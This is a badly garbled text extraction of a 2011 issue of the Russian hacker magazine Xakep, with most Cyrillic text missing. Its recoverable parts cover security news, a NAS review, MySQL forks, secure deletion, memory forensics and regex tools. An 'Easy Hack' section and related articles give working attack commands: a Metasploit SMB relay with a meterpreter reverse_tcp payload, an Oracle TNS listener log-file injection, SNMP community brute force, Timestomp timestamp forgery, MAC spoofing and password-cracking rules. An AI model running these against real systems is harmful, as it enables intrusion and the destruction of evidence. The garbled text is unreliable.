Хакер 2011 03 PDF

x 03 (146) 2011
.
210
:

PALEVO: C . 74
03 (146) 2011
MySQL /
MySQL

WINDOWS
. 44

. 22
146

HACKQUEST 2010
RETURN-ORIENTED ROOTKITS
NAS

APPLESCRIPT
PYTHON

. 28
INTRO
, ?
, , .
,
,
.
, , .
: ,
, .
.
, , , .
,
,
.
, IT, ,
.
- ,
. , -

INTRO
1 .
, , ,
.
, 120 varchar(20) ,

, ,
. , ,
,
, , ,
.
,
, . ,
:).
nikitozz, . .
udalite.livejournal.com
http://vkontakte.ru/club10933209
CONTENT
MegaNews
004
082
088
094
- -
FERRUM
016
NAS
PC_ZONE
022
MySQL
028
-,
034
038
,
?
Memoryze

Liberte Linux:
098
Return-Oriented Rootkits !
102
Mac OS X
106
AIR'
112
115
iPhone Mac OS X
AppleScript
Adobe AIR
-
040
Easy-Hack
044
SYN/ACK
050
118
DLP-?
056
122
060
128
066
... !
072
X-Tools
Windows
HackQuest 2010
MALWARE
Mac OS X
Apple
Microsoft Oracle
132
074
Palevo!
138
FAQ UNITED
078
Python
142
144
WWW2
FAQ
8.5
web-
066
... !
HackQuest 2010
022
MySQL
,
?
074
Palevo!
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>.

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906
> TECHNOLOGY
(komleva@glc.ru)
>
Hi-Fi
(khamidulina@glc.ru)
>
(alekhina@glc.ru)
(nesterova@glc.ru)
>

>
(maligina@glc.ru)
>
( )
(strekneva@glc.ru)
>

>

> -
(alekseeva@glc.ru)
> MAN TV

>

>

>
(kosheleva@glc.ru)
>

>

>

> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
159 916 .

.

. ,
,
.

.
.

:
content@glc.ru
, , 2011
MEGANEWS
Mifrill (mifrill@gameland.ru)
Meganews
GSM
GSM- ( , ),
(, Kraken,
A5/1). , ,
,
-.
(
). GSM- , , .
, , . Chaos
Computer Club Congress ,
GSM- -,

$15. GSM-
Security Research Labs
, GSM OsmocomBB. GMS- ,
. :
SMS-,
. , ,
.

,
,
( ).
, ,
. GSM-:
,

. ,
. 64-
, . . ,
( , ),
, -,

.
: events.ccc.de.
100 BitTorrent,
- .
ZEUS + SPYEYE = ?
004
ZeuS SpyEye ,
,
.
, SpyEye ,
.
, , , ,
,
SpyEye, Gribodemon/Harderman.
, . SpyEye,
ZeuS. : Trusteer Rapport,
. ,
Jabber, VNC,
. ,
Firefox.
SpyEye Windows, ,
ffcertgrabber, ,
. , ,
Trend Micro,
. , .
X 03 (146) 2011
MEGANEWS
IT-
. Apple,
. , 2009 ,
. ,
,
, .
,
.
Apple ,
2009.
Google ,
, .

. ,
2001 , Google
,
.
,
Panda Labs, $2. $80
. ,
$82 000, $700.
006
Trend Micro
, WORM_RIXOBOT.A ( TROJ_RANSOM.
QOWA).
, .

2010 137 000 .
: , Trend Micro
.

,
.
, SMS 2 500 , 2%
. ,
SMS 360 , ,

901 245 ($29.5 .). ,
, , ,
100 000 000 . , -
,
?
X 03 (146) 2011
MEGANEWS
. FACEBOOK.

,
, .
.
Facebook,
, .
Gmail Yahoo , , Facebook, . ISP
JavaScript, HTTPS HTTP
.
(, ,
2010, -
HTTPS). , URL,
.
ISP. ? ,
. , Facebook
. Facebook
,
, . -
, 5- ,

, !
, ,
, Facebook
. , ,
, !
, , Facebook
. 10-
: HTTPS- (- ISP
HTTP, -
), . , ,
.
, ,
Facebook .
51,8% Android 2.2

Google. 2.3
0.4% .

,

.
(, )
,
, WirelessHD, WHDi WiDi.

Wireless
USB-, ,
.
, ,
.
, , USB-,

.
KFA2 NVIDIA GeForce
GTX 460 WHDI. ,
,
WHDI (Wireless Home Digital Interface).

WHDI- ( , ?),
.
,
. WHDI
008
(
!), FullHD
(1080p). , , GeForce
GTX 460 WHDI 1 GDDR5
256- ,
, CUDA.
,
-! :)

. .
,
,
.
X 03 (146) 2011
MEGANEWS
, ,
.
, ...
, .

. 26- (.
146 ).
,
. , , ,
! . 26-
,
(
), 200 000.

108 000 .
, , . , ,
,
,
.
80
CES 2011, -.

,
. ,
, .
LG, LED- E90 c 21.5. ,
, ,
7.2 !
, -
( 40% ,
-
CCFL)
. E90
.
(D-sub, DVI-D, HDMI)
EZ-cabling.
: 2
, 1920x1080. 13 000 .

CES
eCoupled. eCoupled
( ),
90%
10% .

. ,

, ,
Tesla Roadster.
eCoupled, , (
).

.
010
X 03 (146) 2011
APP STORE
Apple
Mac App Store
.
App Store ( iPhone,
iPod touch iPad),
,
Mac OS.
App Store:
, ,
.
iTunes ,

. Mac App Store
, .
Mac OS X Snow Leopard.
Mac
Linux :
, Microsoft
?. , .
?
107 . , , 89,1% (
Pingdom).
HOTMAIL

Windows Live Hotmail Microsoft. ,
, Hotmail ,
(, ).
,
. ,
, , ,
Hotmail. Windows Live
:
.
,
. Microsoft ,
,

, .
, , ,
, . .
X 03 (146) 2011
011
MEGANEWS

CES (Consumer Electronics Show),
- ,
. , Motorola Atrix 4G,
. Motorola
,
. , . , Atrix 4G HDMI-
, USB-
( -),
. -,
- 11.6, ,
, .
,
- .
, Atrix 4G ? : Motorola Atrix 4G ,
, .
4- (960540 )
NVIDIA Tegra 2
1 . Android 2.2,
2.3. ,
1930 ,
9 , 136 .
, (5
), VGA- ,
Wi-Fi 802.11b/g/n, Bluetooth, GPS, miroSD .
, ,
. , ,
Motorola,
, .
10 Wikipedia 15 . .
3D
Avenue Q, :
Internet is for porn ( ), .
,

.
. ,
,

,

.
:
Kinect Microsoft XXX (, ,
). 3D-
3D-. , , 3D ,

. ,
3D
, . ,
,
3D-. ,
: ,
, , -
3D-
. , ,
:).
WINSTON FREEDOM MUSIC

2010
Winston Freedom Music.
Super Jam Sessions,
, .
,
- Kaiser Chiefs,
, Grammy MTV Music
Awards, Dirty Vegas.
012
X 03 (146) 2011
MICROSOFT
,
Apple Magic Mouse.

,
. :
Apple
Microsoft. ,
Touch Mouse, , , .
: . ,
, ,
.
,
, ,
. BlueTrack
,
.

. Touch Mouse
USB- Snap-in Nano, 2.4 .
,
Amazon.com
. $79.95.
ITUNES-

iTunes, Apple
. ,
, Apple ,

.
TaoBao ( Ebay)
50 000 iTunes
.
, .

Apple, ,
( ,
). ,

iTunes?
,
, ,
(
). , ,
.
PayPal, ,

iTunes , ,
iTunes,
Apple.
MS
, GeoHot,

iPhone PlayStation 3.
(geohot.com)

Windows Phone 7,
Microsoft. ,

. ,
Microsoft
WP7-X 03 (146) 2011
. : GeoHot,
WP7,
e-mail,
WP7-!. ,
, Microsoft
, .
: MS
ChevronWP7
( WP7)
.
013
MEGANEWS
SMS
, ? , , , , .
27C3,
.
,

, MMS ,
. , , , , SMS
-
.
GSM-,
120 000 SMS. , ,
- .

Samsung, Sony Ericsson, Motorola LG. ,
SMS-.
45% PayPal.
, OpenDNS.
DDR4 SAMSUNG
Samsung
DDR4, , 3 . ,
, ,
, 40%
, DDR3, 1.5 ,
. ( DDR4
1.05 )
Pseudo Open Drain (POD),
/. 2.133 /
1.2 ( DDR3,
1.35 1.5 , 1.6 /). JEDEC
DDR4 .
MOZILLA
Mozilla Foundation , , , , 44
000 ,
addons.mozilla.
org. -
, , .
Mozilla ,
,
,
014

2009 . ,
,
MD5. ,

,
.
Mozilla, , ,
,
,
Mozilla.
X 03 (146) 2011
X 03 (146) 2011
15
FERRUM

: Intel Core 2 Duo E4700

( 3500 )
: ASUS P5QC
: 2x1024 ,
Kingston , DDR2-800
: NVIDIA GeForce 9800 GT
: 430 , Thermaltake
: Microsoft Windows 7
Ultimate x32
D-Link DNS-343
NETGEAR ReadyNAS NVX
QNAP TS-459
Synology Disk Station DS411+
Synology Disk Station DS410j
Thecus N3200
NAS
,
, , .
HDD ,
, , .
NAS .
NAS : Network Attached Storage

. , ,
. ,
, NAS
,
. . , NAS
,
, - -, , IP- . NAS
,
RAID. , , . ,
, , ,
RAID 0 ( , Ethernet
). ,
, RAID 1 RAID 5,
.
(USB, eSATA ), -
016
,
NAS . -,
.

NAS
: Thecus N3200
HDD , ,
. 2 Hitachi. ,
,
Intel NAS Performance Toolkit,
NAS-, , ,
-, .
RAID 5
RAID 0. ,
, , , , ,
.
X 03 /146/ 2011
13500 .
22000 .
D-Link
DNS-343
NETGEAR
ReadyNAS NVX
: CIFS/SMB, FTP, UPnP, http

: -, -, torrent-, iTunes
: RAID 0, RAID 1, RAID 5, JBOD, Standard
: 128
: ARM926EJ
: Ethernet (10/100/1000 /), USB
: CIFS/SMB, FTP, UPnP, http, AFP, NFS,

DLNA, Bonjour
: -, -, torrent-, iTunes, ReadyNAS Remote
: X-RAID2, RAID 0, RAID 1, RAID 5
: 1
: Intel EP80579 1
: 2xEthernet (10/100/1000 /), 3xUSB
D-Link DNS-343, , : ,

. -,
, IP , ,
. , D-Link DNS-343
.
ReadyNAS NVX - ,
- . , .
,
LCD-, .
, .
, .
ReadyNAS NVX, ,
.
X-RAID2, -.
, .
, , USB . , D-Link DNS-343 . ,
.
X 03 /146/ 2011
ReadyNAS NVX
[O2], :
.
017
FERRUM
31000 .
27000 .
QNAP
TS-459 Pro
Synology
Disk Station DS411+
:CIFS/SMB, FTP, UPnP, http, AFP, NFS,

DLNA, Bonjour, iSCSI
: -, -, torrent-, iTunes.
: RAID0, RAID1, RAID5, RAID6, RAID5+, JBOD
: 1
: Intel AtomD510 1.66
: 2xEthernet (10/100/1000 /), 5xUSB, 2xeSATA, VGA

: -, -,mail-,
torrent-, iTunes.
: RAID0, RAID1, RAID5, RAID6, RAID5+, RAID 10, JBOD,
Standart
: 1
: Intel Dual-core 1.67
: Ethernet (10/100/1000 /), 2xUSB, eSATA
QNAP
. 5 USB,
,
eSATA, VGA. QNAP TS-459 Pro Intel Atom , 1.66
Hyper Threading. 1
DDR2 . ,
, ,
, NAS. , .

.
-, - PHP/
MySQL. , IP-, Synology
Disk Station DS411+ . .
, ,
.
, , . , , .
018
, , Synology Disk Station DS411+

: USB eSATA. ,
. ,
,
, .
X 03 /146/ 2011
14500 .
9000 .
Synology
Disk Station DS410j
Thecus
N3200

: -, -,
mail-, torrent-, iTunes.
: RAID0, RAID1, RAID5, RAID6, RAID5+, RAID 10, JBOD,
Standart
: 128
: ARM 800
: Ethernet (10/100/1000 /), 2xUSB
: CIFS/SMB, FTP, http, AFP, NFS, DLNA,

: -, -,
torrent-, iTunes.
: RAID0, RAID1, RAID5,JBOD
: 256
: AMD Geode LX800 500
: 2xEthernet (10/100/1000 /), 2xUSB, eSATA
Synology .
, ,
, DS411+.
, , -, :

.
Synology Disk Station DS410j ,
.
, Synology Disk Station DS410j , USB

. USB, .
X 03 /146/ 2011
,
. ,
, , . , RAID5 Thecus N3200
. ,
HDD,
. AMD. :
-, -,
.
, .
, , Thecus N3200 .
, , .
.
019
FERRUM
INTEL NAS PERFORMANCE TOOLKIT, RAID 0

D-Link DNS-343
QNAP TS-459 Pro
Thecus N3200
Photo Album
File copy from NAS
File copy to NAS
HD Video Playback
0,0
20,0
40,0
60,0
80,0
100,0
120,0
140,0
QNAP TS-459 Pro Synology Disk Station DS411+
INTEL NAS PERFORMANCE TOOLKIT, RAID 5

D-Link DNS-343
QNAP TS-459 Pro
Thecus N3200
Photo Album
File copy from NAS
File copy to NAS
HD Video Playback
0,0
20,0
40,0
60,0
80,0
100,0
120,0
140,0
RAID5
, NAS,
. QNAPTS-459 Pro
, .
020
Thecus N3200
.

, Synology Disk Station
DS411+. z
X 03 /146/ 2011
PC_ZONE
aleks.raiden@gmail.com

MySQL

,
Oracle
Sun, MySQL?
? .
!
MySQL, . , , .
. - -.
, , .

MySQL. ,
Sun
Oracle. ,
,
MySQL.
. Oracle, , , : - .
.
022
5.5, , :
, . ? MySQL , ,
. .
, MySQL.
, ?
, PostgreSQL. ! MySQL,
.
. ,
( X 03 /146/ 2011
MariaDB
MariaDB
).
- MySQL? .
(
MySQL), ,
.
MySQL
,
.
, .

, ,
,
.

InnoDB,
Oracle. , MariaDB.
MariaDB
2008 ,
MySQL, ,
,
, MySQL.
MyISAM,
, ,
. -
MySQL,

X 03 /146/ 2011
MariaDB? ,
,
SQL MySQL.
:
.
?,
.
, , ,
. ,
Sphinx,
,
.
, (
, Google Facebook)
MariaDB.
,
.
,
. MariaDB
,
.

InnoDB MyISAM, MariaDB
, . Aria
MyISAM

. MyISAM
,
, Aria ,
.
MariaDB ,
. Oracle
InnoDB XtraDB,
Percona.
MySQL
, .
( )
.
MySQL XtraDB
MariaDB , InnoDB.
HTTP://WWW
links
SkySQL: skysql.com;
MariaDB:
mariadb.org;
Percona:
percona.com;
Drizzle: drizzle.org;
MySQL: mysql.com;
HandlerSocket:
bit.ly/a9B7Gh.
INFO
info

Oracle

,

$2 000 000,

$300 000.
,
,

.
023
PC_ZONE
?
,
. , , API .
, , (
),
.
( + ) ,
.
,
. MySQL .
InnoDB (, )
,
. ,
MariaDB Drizzle, .
MySQL- .
InnoDB , 5.5
- . , , . .
MyISAM ,
. ,
.
MySQL,
.
Aria MyISAM .
MyISAM.
CVS ,
, .
Federated/FederatedX

() .
, ,
.
XtraDB : . ,
InnoDB, :).
,
( ?) MySQL.
Google , , ,
, MySQL
.
XtraDB
I/O, -
.
,

, .
, ,
.
SHOW ENGINE INNODB STATUS.
: ,
, ,
, MySQL. :
,
.
.
, Firebird
PosgreSQL, , -
024
PBXT InnoDB ,
, ,
.
.
Blackhole , ,
, /dev/null
. .
Archive ,
. ,
. , .

.
XtraDB InnoDB Percona.
MERGE Federated
.
MEMORY ,
, .
, .
BlitzDB MyISAM
. .
NDB , , , .
Falcon MySQL AB, Sun,
InnoDB.
SphinxSE
Sphinx.
. , .
MVCC (Multiversion Concurrency Control
,

) . MariaDB PBXT,
, . , , ! PBXT
,
, -
, MySQL ...
X 03 /146/ 2011
MySQL
. ,
,
, .
, - - ,
,
. FederatedX,

, OQGRAPH,
, . , Facebook ,
, .
Percona?
Percona, .
, c
, ,

MySQL. ,
Percona MySQL
.
,
.
Percona
5.1,
5.5, Oracle.
PBXT, ,
Percona.
, .
X 03 /146/ 2011
Handlersocket-, InnoDB
NoSQL . ,
, 750 000
Cloud Computing
Drizzle
. ,
: cloud computing, Google Proto Buffers, ,
. :
,
, , CRM-.
MySQL,
,
025
PC_ZONE
NoSQL-
NoSQL. ,

SQL-
- (key-value).
/ (
Redis) , , JSON ( MongoDB). , , ,
,
SQL- ? : Yoshinori
Matsunobu HandlerSocket, InnoDB NoSQL-,
SQL. : 750 000 ! , Percona ,
. ! , ,
,
, Drizzle
?
.
UNIX- ( ,
) Windows.
Drizzle
. ?
, , ,
. Google Protocol Buffer. , ,
. ,
.
MySQL-,
libdrizzle
, Perl, PHP, Python
Lua.
: MySQL.
Gearman (.
), Drizzle
Drizzle

026
, memcache ,
RabbitMQ ( WebSocket).
Drizzle InnoDB,
. XtraDB PBXT.
Drizzle MySQL 5.0,
.
. Drizzle , .
MySQL, Oracle , , ,
. MySQL
, LAMP (LinuxApache-MySQL-PHP).
,
MySQL. . , 100%
.
: ,
. ,
.
,
,
,
. MariaDB
.
, Drizzle.
,
.

Oracle Percon.
,
,
MySQL,
. ?
! z
, ,

X 03 /146/ 2011
PC_ZONE
Ant (antitster@gmail.com)
-,

, ,
.
, , ,
, .
, .
!
028
X 03 /146/ 2011
? : ,
.
- , (, R-Studio). , .
-,

, .
,

,
.
.
- !

. , ,
. ,
.
(
).
- Windows
Thumbs.db. ,
,

sdelete

Thumbs.db
X 03 /146/ 2011
.
, .
, ,
JPEG ( ).

. Thumbs.db ( , ). Thumbnail Database Viewer
(itsamples.com/thumbnail-database-viewer.html). ,
, . SDelete (technet.microsoft.
com/ru-ru/sysinternals/bb897443)
: sdelete.exe -p 2 file1.jpg
- ,
, .

. , - Thumbs.
029
PC_ZONE
db? , ?
- ! ,
. ,
,
? Thumbs.db. Windows XP DisableThumbnailCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Explorer\Advanced 1. Windows 7
NoThumbnailCache HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\Policies\Explorer. , ,
Thumbs.db.
Thumbs.db
.
, ,
<Shift+Delete> . , ,
.
, . ,
,
, .
,
, . ,
, NTFS. - :
JPEG. WinHex jfif.
274432. ,
( HDD Wipe Tool) . ,
WinHex, 274432,
.
DiskDigger, Photorec, Foremost .
.
, , ,
, ? , . ,
. ,
. ASCII. ,

. , anti,
: 0110000101
1011100111010001101001. , ,
anth. . . ,
,
, .
.

,
-.
.
030

Foremost
.

, .
. , ,
(
).
(pagefile.sys) , Hibernation (hiberfil.sys).
,
. , .
, :

. , Back Track,
, . , LiveCD, BackTrackForensic,
Foremost.

.
, , , :
#foremost -i /mnt/hda1/pagefile.sys -o /root/
Desktop/page_file -v -q
/mnt/hda1/
pagefile.sys, /root/
X 03 /146/ 2011
Foremost

AccessData FTK Imager
,

mp3jpgmp3jpgmp3jpg
Desktop/page_file. .
Foremost 524
.

jpg:= 73
gif:= 4
gif:= 19
jpg:= 77
jpg:= 95
doc:= 1
pgp:= 65
pgp:= 62
pgp:= 44
pgp:= 36
dat:= 7
lnk:= 3
cookie:= 38

.
, jpg. X 03 /146/ 2011

COOKIE
,

,

YOUTUBE.
, .
: ,
; -; Facebook
. ,
.
, doc-,
. , , Word
, .
cookie
,
,
YouTube. ,
,
.
? . .
Control PanelSystem and
SecuritySystemAdvanced System SettingsPer
formanceAdvancedVirtual MemoryChange
No paging file.

.
,
ClearPageFileAtShutdown HKEY_LOCAL_
MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\Memory Management 1. , ,
,

. hiberfil.sys.
INFO
info

:
Eraser 6.0.8:
eraser.heidi.ie;
SDelete 1.51:
technet.microsoft.
com/ru-ru/
sysinternals/
bb897443;
Freeraser: codyssey.
com/products/
freeraser.html;
Overwrite 0.1.5:
kyuzz.org/antirez/
overwrite.html;
Wipe 2.3.1: wipe.
sourceforge.net;
Secure Delete:
objmedia.demon.
co.uk/freeSoftware/
secureDelete.html;
CCleaner 3.03:
piriform.com.
DVD
dvd

.
031
PC_ZONE

DiskDigger

,
. ,
. , FTK Imager (accessdata.com/support/adownloads).
FileAdd Evidence Item ,
.
, pagefile.sys .
,

. , ,
DiskDigger (diskdigger.org) PhotoRec (www.cgsecurity.org/wiki/
PhotoRec). ,
.
-.
.
WinHex. ,
. WinHex,
Open Disk .
(Ctrl+A)
(Ctrl+L). ,
.
, , .
NTFS. Windows
XP FAT, NTFS.
,
,
Optimize for performance.
NTFS.
,
. .
jpeg- - (, jpeg) : 1.mp3, 1.jpg, 2.mp3, 2.jpg, 3.mp3, 3.jpg.
, ?
, DiskView (technet.
032
microsoft.com/ru-ru/sysinternals/bb896650). ,
, (
). , . , <Refresh>. ,
, ,
, .
, . <Refresh> , jpeg-
. WinHex.
, ,
: jfif, jpeg-. ,
, ,
. , :
, :). , , :
C:\Documents and Settings\Administrator>defrag h:
Windows Disk Defragmenter
Copyright (c) 2001 Microsoft Corp. and Executive
Software International, Inc.
Analysis Report
7,47 GB Total, 7,43 GB (99%) Free,
Fragmented (0% file fragmentation)
0%
Defragmentation Report
7,47 GB Total, 7,43 GB (99%) Free,
Fragmented (0% file fragmentation)
0%
, , .
<Refresh> DiskView, ? ,
,
, . !
, ,
?
, . jfif. -, !
.
DiskDiggera
Photoreca. ,
X 03 /146/ 2011
274432
DiskDigger
6 3
274432
-
.
Sdelete
,
. ,
- .
!
, ,
? . , ,
. ,
// .
? metasploit.com
, Timestomp (metasploit.com/data/antiforensics/timestomp.
exe), ,
. :
-m <date>
-a <date>
-c <date>
-e <date>
-z <date>
X 03 /146/ 2011

, MFT

DiskDigger
: DayofWeek Month\Day\Year
HH:MM:SS [AM|PM]. -b, ,
EnCase :). ,
,
: timestomp.exe boot.ini -z "sunday 1/12/2099
10:00:00 pm". ,
.
:
for /R c:\tools\ %i in (*) do timestomp.exe %i -z
"monday 3/12/2009 10:00:00 pm"
-
HDD. ,
, . -,
, .
DefCon: isecpartners.com/files/
iSEC-Breaking_Forensics_Software-Paper.v1_1.BH2007.pdf.
. , .
,
, ,
.

.
:). z
033
PC_ZONE
Step twitter.com/stepah
Memoryze

live, .
, , ,
-,
,
.
, .
, , .
034
,
, .
Mandiants Memoryze ,
.
X 03 /146/ 2011
Memoryze
, ,
. Memory Forensic.
( Memoryze)
, ,

. . , , (
, ) , ,

. ,
.
- ,
. ,
, .
, .
Memoryze?
Memoryze .
, must have,

, . ,
-
. ,

, . Mandiant:
mandiant.com/products/free_software.
, Memoryze:
(
API-),
;
, DLL EXE, (
);
;
, ,
,
(,
X 03 /146/ 2011

),
,
;
, ;
, , ;
;
(
);
.
, Memoryze,
, : Memoryze
GUI- Audit Viewer.
. Memoryze
, .
,
Audit Viewer,

.
,
.

, ,
. , portable,
: msiexec /a MemoryzeSetup.
msi /qb TARGETDIR=_____
_.
Audit
Viewer,
.
, , . , Memoryze
.
batch .
, MemoryDD.bat, -
.
c memoryze.exe : G:\\\\memoryze\\\\MemoryDD.bat.
: -
HTTP://WWW
links
,

Audit Viewer.

c Memoryze

batch-.
,
,

Process.bat.

,

. ,
Process.bat ports
true

. ,
, GUI

.
035
PC_ZONE

Reverse Engineering?
Memoryze . , .
, , ,
,
.

.
:
ProcessDD.bat -pid<PID>
;
ProcessDD.bat -pid <PID> -input<filename>
.
:
DriverDD.bat -driver<drivername>;
DriverDD.bat -driver<drivername> -input<fname>.

. . ,
Memoryze kernel-mode ,
. .
, , - .
, .
,
. ,
. ,
( Memoryze/Audits).
, .
, .
, ,
Audit Viewer.

Memoryze. , .
, .
(, , ) .
. , , Memoryze Audit Viewer
, , (, Windows XP
SP1). ,
:
Windows 2000 Service Pack 4 (32-bit);
Windows XP Service Pack 2 and Service Pack 3 (32-bit);
Windows Vista Service Pack 1 and Service Pack 2 (32-bit);
*Windows 2008 Service Pack 1 and Service Pack 2 (32-bit);
*Windows 2008 R2 Service Pack 0 (64-bit).
,
-.
auditviewer.exe Configure
Memoryze. Open Existing
036

Results
.
Memoryze . :
(,
) . img-
.
,
, . ,
, , .
. :
Audit Viewer, .
.
,
, . , (Extract
strings) .

( ), , .
:
(Process Enumiration) ,
Extract Strings.
(Acquisition)
. ,
-
.
, Audit Viewer
, -.
, , , ( ).
, .
X 03 /146/ 2011
BAT-, Memoryze

DLL, ,
. :
, , , , .
.
.
, . Occurrences
(,
dll-).
Least Frequency of Occurrences
(LFO), .
, :
.
, , ,
. , .
.
, .
Audit Viewer live-,
. ,
swap-, .
MRI (Memoryzes
Malware Rating),
.
- ,
. ,
, .
.

( MD5, SHA1, SHA256). ,
: , MD5.
. ,
img-, Acquire (and/
or) Analyze Live Memory. . ,

. ,
.
( ,

) Memory
Acquisition.
X 03 /146/ 2011
Memoryze?
Memoryze Audit Viewer

Memory Forensic. Volatility Framework
(volatilesystems.com). MiniGW Python Windows,
.
Linux (
bit.ly/VolatilityManual).
SANS
Investigative Forensic Toolkit
.
VMware (computerforensics.sans.org/community/downloads)
.
- , - ?
Memoryze.

.
:
, .
, Audit Viewer ,
. , .
(Occurrences
MRI)
, .
, Memory Forensic
, ,
( ). ,
,
. z
DVD
dvd

.
037
PC_ZONE
PC_ZONE
Step step@gameland.ru

?
, , , . ,
. ( )
- ,
. -
,
, -,
, -,
. .

. , , .
, ,
, .
,

,

.
,
.
,
, : sed grep.

: ,
.
-
,

. .

,
. , , ,

Wikipedia. ,
,
,
.
,
38
038
, ,
, . strfriend
(strfriend.com)
, .
.
-

. e-mail
^([^@\s]+)@((?:[-a-z0-9]+\.)+[a-z]{2,})$
.
,
(. ).
,
,
( , ) , ,
.
Graphrex (crotonresearch.com/
graphrex),
Eclipse.

RegexBuddy (regexbuddy.com),
.
( ) :
. ,
. ?

, , 2-
4- , A Z
0 9, RegexBuddy
: \A[A-Z0-9]{2,4}.

,
(Perl,
C#, PHP, Python, Java, JavaScript ).

,
.
,
Expresso (ultrapico.com) The regulator
(sourceforge.net/projects/regulator). RegexBuddy ,
.

,

.
, ,
.

. RegexMagi (regexmagic.
com). , ,

,
,
.

. z
XX 0013 (/114446)/ 22001111

GreenDog (agrrrdog@gmail.com)
Easy Hack
1
Metasploit,
MAC,
Oracle,
Zenmap
: GUI-
Metasploit Framework.
:
MSF GUI-, Java. , .
. Java- . . ,
.
/, . .
.
-, .
, :).
. (, ) Armitage. - . fastandeasyhacking.com.
Armitage, GUI, Java RPC MSF ( RPC,
- MSF,
Armitage ). GUI Java 1.6, (PostgreSQL
MySQL), MSF. Armitage ,
-.
. - :). ,
.
, MSF , . ,
.
:
fastandeasyhacking.com/media.
,
Armitage GUI. :
,
( MSF) :
ruby msfrpcd P password f
P ( msf), -f (
Win).
3. Armitage , armitage.bat. ,
msfrpcd, . ,
MSF' %MSF%\
config\database.yml.
4. Connect :).
*nix.2.
:);
, ;
/ ;
.
1. Armitage , apt-get:
apt-get install armitage
2. Win- ( ruby ).
Incognito.
3. . BackTrack4 R2 MySQL:
Armitage
, MSF (
- ?).
MSF (msfupdate). , Win.
1. MSF.
, armitage.bat , icons; armitage
msf3, armitage data.
2. msfrpcd.
msfconsole loadxml, ,
040
MySQL:
/etc/init.d/mysql start
Armitage:
./armitage.sh
\ root\toor.
: Armitage
msfupdate.
X 03 /146/ 2011
: MAC- .
:
--, .
. , MAC- 48- , .
, MAC .
MAC . ,
- . MAC'
. MAC-,
- , .
Unix macchanger (alobbs.com/
macchanger). MAC,
( )
.
MAC-
ifconfig eth0 down
macchanger -a eth0
MAC eth0,
.
(Linux):
ifconfig ethN hw ether <mac-address>
Win TMAC
(technitium.com) ,
. , IP
DHCP,
:
, SNMP-.
:
SNMP (Simple Network Management Protocol)
(,
, ).
SNMP UDP-. 161 . SNMP .
1 ,
community string, UDP-.
. 2 3 , .
, IP
SNMP-. ,
UDP .
, ,
. community string' public
private / .
, public , .
, SNMP , X 03 /146/ 2011
.
:). , ' DoS- IP- . ,
DHCP. ,
MAC' IP. DHCP-
. MACIP 24
. , (
) IP-,
, :). Metasploit'
, DHCP Exhaustion.
, DNS MiTM. :
digininja.org/metasploit/dns_dhcp.php
, . , SNMP-

- , IBM Tivoli. .
-, 1 . -,
SNMP , .
-, -
ssh , SNMP
. UDP-.
. community, Metasploit':
:
use auxiliary/scanner/snmp/snmp_login
:
set RHOSTS ip_addr
run
, .
auxiliary/scanner/snmp/snmp_enum.
. SNMP
041
,
, MIB ( )
, (
snmp_enum).
, /.
/ Cisco, Windows-.
MIB' SNMP net-snmp.sourceforge.net, ,
, BT4..
:
.
:
. ,
- , , . ,
?
... netcraft.com
.
, xakep.ru. xakep (. ). , ,
, .

:
- ;
? ;
[] - .
, xakep.ru
:
... xakep.ru +
*.xakep.ru
googl:
www.google.*.??
, IP- .
:
Windows.
:
, , (Safe Mode) -
, :). ,
, ( :)),
. :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
SafeBoot

. :
, .
. SafeBoot -
: Windows c Oracle
TNS-listener.
:
TNS-listener'.
Oracle 8/9. (
), . set_log' SMBRelay'.
, , .
042
?
() Minimal Network, ,

.
, , . ,
:).
, SMBRelay (, Metasploit):
use exploit/windows/smb/smb_relay
:
set PAYLOAD windows/meterpreter/reverse_tcp
smbrelay:
set RHOST IP_
back-connect :
set LHOST _IP
exploit
X 03 /146/ 2011
perl-, Oracle-
, SMB-relay.
./tnscmd.pl -h oracle_server_ip --rawcmd
"(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)
(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE
=LISTENER)(VERSION=1)(VALUE=\\\\ip_smb_relay_
server\\share)))"
: Nmap
Zenmap.
. Oracle (8/9), , ,
, ,
.
Oracle'
, . ,
.
- vimeo.com/5500931.
op, fp, ufp ,

, , .
s: (. ).
Zenmap'
. ,
.
GUI
1 000,
.
Nmap .
. , XML ( -oX) gnmap ( -oG).
greppable nmap, grep.

.
grep'
Zenmap
, .

Zenmap'.
: Zenmap GUI Nmap'.

.

, , . , Zenmap
XML-.
-,

. , ,

- ,

.
,
XML
.
, ,
.
.
IP-
.
:
OllyDBG.
:
,
, . , -
,
, .
. ,
,
X 03 /146/ 2011
,
. , :).
. .
.
OllyStepNSearch,
(blog.didierstevens.com/programs/
ollystepnsearch).
, , ( F7) ,
. ,
, . . z
043

m0r0 m0r0@inbox.ru
Windows

. .
,
, , . ,
:
.
,
, . ,
.
-
AD. AD
, .
, . , .
AD. , , .
() . .
, , , . , , .
, ,
. , , -
044
, . , .
100%- .
,
. , , ,

. , , ,
, . ,
, ,
. ,
.
, .
exploit-db vupen, Canvas Core
Impact. . Metasploit
meterpreter .
, ?
X 03 /146/ 2011
,

.
,
cain . LM-
(, ),
.

.
, LM
, , , .
,
. ,
.
, .
? , , ,
. ( )
. ,
.
?
, ,
, ,
. , ,
Adm391. ,
, . ,
,
.
, (,
IP-), .

-.
john.ini john.ini.bak ( ) :
john.ini
[List.Rules:Wordlist]
$[0-9]
$[0-9] $[0-9]
